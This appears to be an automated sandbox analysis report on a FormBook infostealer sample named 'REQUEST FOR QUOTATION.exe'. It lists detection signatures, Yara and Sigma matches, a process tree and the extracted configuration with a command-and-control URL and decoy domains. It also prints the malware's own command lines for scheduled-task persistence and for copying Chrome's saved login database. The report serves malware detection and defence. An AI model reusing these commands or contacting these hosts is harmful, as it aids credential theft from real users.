Play interactive tour

Edit tour

Analysis Report REQUEST FOR QUOTATION.exe

Overview

General Information

Sample Name:	REQUEST FOR QUOTATION.exe
Analysis ID:	356564
MD5:	1d229f76672a250bd0c2ff84417d63e3
SHA1:	907889ef592995b2e923bc367ad5fe5fb3ab8275
SHA256:	65dbaf77c991e5737ecf9041dea34a7e9eca1e38925ff69340435a3cff1314a3
Tags:	FormBook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected FormBook malware

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Sigma detected: Steal Google chrome login data

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

REQUEST FOR QUOTATION.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe' MD5: 1D229F76672A250BD0C2FF84417D63E3)

schtasks.exe (PID: 7132 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

REQUEST FOR QUOTATION.exe (PID: 3848 cmdline: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe MD5: 1D229F76672A250BD0C2FF84417D63E3)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

systray.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)

cmd.exe (PID: 240 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.entrustedhomeinspections.com/xxg/"], "decoy": ["avoidandaxidents.com", "splendorinthewoods.com", "soubeta.digital", "sellfreecourses.com", "upstreamleadership.com", "crescentdough.com", "yycqfw.com", "tmfosbqhu.icu", "franmogulfranchise.com", "xn--qrq5jk69mkda.com", "moreiramenezes.com", "defidegen.com", "corchosc.com", "jemadrqhxaahe.com", "gerderser.com", "bajihalozat.com", "stickleyrep.com", "sah-ko.net", "kenapa5-and.com", "truehealerwithin.com", "conkamx.com", "therukoothutamil.com", "laikaswatches.com", "paradiseminks.com", "jerikashofashion.com", "brickhouse.cloud", "theozserver.com", "surendra-sharma.com", "malaysianmoney.com", "artoutlive.online", "lovingsunmarket.com", "premiumnetworkstore.com", "160meter.com", "geeksgambit.com", "voluminousaesthetics.com", "secure000-amazon.com", "jrubrand.com", "oxz5.com", "sonoscape.email", "naigves.com", "htwa.net", "rfl.xyz", "kuangjiam99.com", "inventqa.com", "9ine-tees.com", "188jersey.com", "yourspartanyard.com", "upwardinjesus.life", "644745.com", "deepbluedecor.com", "schleperkortebau.info", "txsurvivalkit.com", "tooplaya.com", "fukaikeji.com", "tntvor.com", "internationalsoccerteams.com", "attorneyscottrynecki.com", "ptpatennis.com", "hottomsoutlet.com", "oshitapartscenter.com", "tropicalcure.com", "mastermindsnow.com", "covidacademicexpert.com", "energiern.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x281ec8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x282132:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2ae8e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2aeb52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x28dc65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2ba685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x28d751:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2ba171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x28dd67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2ba787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28dedf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2ba8ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x282b4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2af56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x28c9cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2b93ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x283843:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2b0263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x293ad7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2c04f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x294aea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2909f9:$sqlite3step: 68 34 1C 7B E1 0x290b0c:$sqlite3step: 68 34 1C 7B E1 0x2bd419:$sqlite3step: 68 34 1C 7B E1 0x2bd52c:$sqlite3step: 68 34 1C 7B E1 0x290a28:$sqlite3text: 68 38 2A 90 C5 0x290b4d:$sqlite3text: 68 38 2A 90 C5 0x2bd448:$sqlite3text: 68 38 2A 90 C5 0x2bd56d:$sqlite3text: 68 38 2A 90 C5 0x290a3b:$sqlite3blob: 68 53 D8 7F 8C 0x290b63:$sqlite3blob: 68 53 D8 7F 8C 0x2bd45b:$sqlite3blob: 68 53 D8 7F 8C 0x2bd583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: REQUEST FOR QUOTATION.exe PID: 6992	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.2.REQUEST FOR QUOTATION.exe.32b277c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x13cbb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13ce22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1695d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x169842:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x175375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x148441:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x174e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x148a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x175477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1755ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13d83a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16a25a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1476bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1740dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13e533:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x16af53:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14e7c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x17b1e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14f7da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x14b6e9:$sqlite3step: 68 34 1C 7B E1 0x14b7fc:$sqlite3step: 68 34 1C 7B E1 0x178109:$sqlite3step: 68 34 1C 7B E1 0x17821c:$sqlite3step: 68 34 1C 7B E1 0x14b718:$sqlite3text: 68 38 2A 90 C5 0x14b83d:$sqlite3text: 68 38 2A 90 C5 0x178138:$sqlite3text: 68 38 2A 90 C5 0x17825d:$sqlite3text: 68 38 2A 90 C5 0x14b72b:$sqlite3blob: 68 53 D8 7F 8C 0x14b853:$sqlite3blob: 68 53 D8 7F 8C 0x17814b:$sqlite3blob: 68 53 D8 7F 8C 0x178273:$sqlite3blob: 68 53 D8 7F 8C
5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe7998:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe7c02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1143b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x114622:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf3735:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x120155:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf3221:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11fc41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf3837:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x120257:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf39af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1203cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe861a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11503a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf249c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11eebc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xe9313:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x115d33:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf95a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x125fc7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfa5ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf64c9:$sqlite3step: 68 34 1C 7B E1 0xf65dc:$sqlite3step: 68 34 1C 7B E1 0x122ee9:$sqlite3step: 68 34 1C 7B E1 0x122ffc:$sqlite3step: 68 34 1C 7B E1 0xf64f8:$sqlite3text: 68 38 2A 90 C5 0xf661d:$sqlite3text: 68 38 2A 90 C5 0x122f18:$sqlite3text: 68 38 2A 90 C5 0x12303d:$sqlite3text: 68 38 2A 90 C5 0xf650b:$sqlite3blob: 68 53 D8 7F 8C 0xf6633:$sqlite3blob: 68 53 D8 7F 8C 0x122f2b:$sqlite3blob: 68 53 D8 7F 8C 0x123053:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe' , ParentImage: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe, ParentProcessId: 6992, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', ProcessId: 7132

Sigma detected: Steal Google chrome login data

Show sources

Source: Process started

Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 6284, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 240

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.entrustedhomeinspections.com/xxg/"], "decoy": ["avoidandaxidents.com", "splendorinthewoods.com", "soubeta.digital", "sellfreecourses.com", "upstreamleadership.com", "crescentdough.com", "yycqfw.com", "tmfosbqhu.icu", "franmogulfranchise.com", "xn--qrq5jk69mkda.com", "moreiramenezes.com", "defidegen.com", "corchosc.com", "jemadrqhxaahe.com", "gerderser.com", "bajihalozat.com", "stickleyrep.com", "sah-ko.net", "kenapa5-and.com", "truehealerwithin.com", "conkamx.com", "therukoothutamil.com", "laikaswatches.com", "paradiseminks.com", "jerikashofashion.com", "brickhouse.cloud", "theozserver.com", "surendra-sharma.com", "malaysianmoney.com", "artoutlive.online", "lovingsunmarket.com", "premiumnetworkstore.com", "160meter.com", "geeksgambit.com", "voluminousaesthetics.com", "secure000-amazon.com", "jrubrand.com", "oxz5.com", "sonoscape.email", "naigves.com", "htwa.net", "rfl.xyz", "kuangjiam99.com", "inventqa.com", "9ine-tees.com", "188jersey.com", "yourspartanyard.com", "upwardinjesus.life", "644745.com", "deepbluedecor.com", "schleperkortebau.info", "txsurvivalkit.com", "tooplaya.com", "fukaikeji.com", "tntvor.com", "internationalsoccerteams.com", "attorneyscottrynecki.com", "ptpatennis.com", "hottomsoutlet.com", "oshitapartscenter.com", "tropicalcure.com", "mastermindsnow.com", "covidacademicexpert.com", "energiern.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe

ReversingLabs: Detection: 14%

Multi AV Scanner detection for submitted file

Show sources

Source: REQUEST FOR QUOTATION.exe	Virustotal: Detection: 28%			Perma Link
Source: REQUEST FOR QUOTATION.exe	ReversingLabs: Detection: 14%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources
